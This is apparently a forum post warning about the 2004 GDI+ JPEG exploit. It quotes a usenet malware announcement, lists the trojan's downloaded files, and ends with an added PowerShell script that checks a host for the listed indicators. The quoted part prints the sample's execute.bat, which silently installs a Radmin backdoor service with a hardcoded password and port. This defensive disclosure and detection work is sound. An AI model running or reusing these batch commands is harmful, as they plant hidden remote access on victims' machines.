As many of you are aware, an exploit involving Microsoft's GDI library (specifically JPEGs) was discovered recently. The exploit is classified by Microsoft and others as "Critical" and affects Windows XP/2003, as well as a variety of Microsoft applications, such as the Office series. (full list found here)
In addition, a toolkit for exploiting the vulnerability was discovered on the 24th to be in circulation around the internet. This toolkit enables a relatively novice attacker to exploit the vulnerability with a minimal amount of effort.
Earlier today, a virus was spotted on usenet that takes advantage of the widespread vulnerability to install a trojan on the target system, which only needs to view the malformed image to become infected. This easy method of infection, in what had been considered an innocuous file type (JPEG), highlights the need to keep Windows updated, as well as to use a virus scanner with current definitions. Windows Update contained the needed patch as of the 14th of September.
Please, update yourself and others.
Here is the important portion of the Virus Announcement, pasted as a quote block so I can edit out certain details.
jpeg virus in the wild?!
UPDATE: To check to see if you have been infected by this virus, look for a directory
named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.
UPDATE: We have packet logs at <removed> THIS VIRUS IS NASTY!
If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus
Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com. It paged
my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
the second hit.
Once this JPEG overflowed GDI+, it phoned home, connected to an ftp site and downloaded
almost 2 megs of stuff. It installs a trojan that installs itself as a service.
It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."
It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://***.***.***.***/www/system/ u/p ***/*** (last time I checked, 93 users were logged in!)
It downloads these files:
-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe
and executes 'execute.bat', which looks like:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
It also installs an irc client with this config info:
<irc channel info> -removed
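A host check for the indicators the announcement gives (the c:\windows\system32\system\ directory with nvsvc.exe and winrun.exe, the r_server service started by execute.bat, and the port 10002 passed to nvsvc.exe), written as an added example for this post; it is not the scanner Swany and the poster wrote, and it assumes a current PowerShell run as an administrator on the machine being checked.

```powershell
# Added example: checks one Windows host for the indicators quoted in the
# announcement above. Paths, file names, the service name and the port are
# taken from the announcement itself; nothing else is assumed about the sample.
$SuspectDir   = Join-Path $env:SystemRoot 'system32\system'   # c:\windows\system32\system\
$SuspectFiles = @('nvsvc.exe', 'winrun.exe')                  # named in the UPDATE line
$ServiceName  = 'r_server'                                    # 'net start r_server'
$ListenPort   = 10002                                         # nvsvc.exe /port:10002

$findings = @()

# 1. The drop directory and the two files the UPDATE line tells you to look for.
if (Test-Path -LiteralPath $SuspectDir) {
    foreach ($name in $SuspectFiles) {
        $path = Join-Path $SuspectDir $name
        if (Test-Path -LiteralPath $path) {
            $item = Get-Item -LiteralPath $path
            $findings += "file present: $path ($($item.Length) bytes, written $($item.LastWriteTime))"
        }
    }
}

# 2. The Radmin service that execute.bat registers and starts as r_server.
$svc = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
if ($svc) {
    $findings += "service '$ServiceName' exists (status: $($svc.Status))"
}

# 3. A TCP listener on the port given to nvsvc.exe. netstat is used rather than
#    Get-NetTCPConnection so the check also works on older Windows releases.
$pattern = "TCP\s+\S+:$ListenPort\s+\S+\s+LISTENING\s+(\d+)"
$listeners = netstat -ano 2>$null | Select-String -Pattern $pattern
foreach ($m in $listeners) {
    $ownerPid = [int]$m.Matches[0].Groups[1].Value
    $proc = Get-Process -Id $ownerPid -ErrorAction SilentlyContinue
    $findings += "TCP $ListenPort listening (pid $ownerPid, process '$($proc.ProcessName)')"
}

if ($findings.Count -eq 0) {
    Write-Output "No indicators from the announcement found on $env:COMPUTERNAME."
} else {
    Write-Output "Indicators found on $env:COMPUTERNAME (isolate the host and investigate):"
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

A hit on any one check is enough to justify taking the machine off the network; the ftp download list above tells you what else (nc.exe, VNCHooks.dll, the irc-u files) to look for in the same directory.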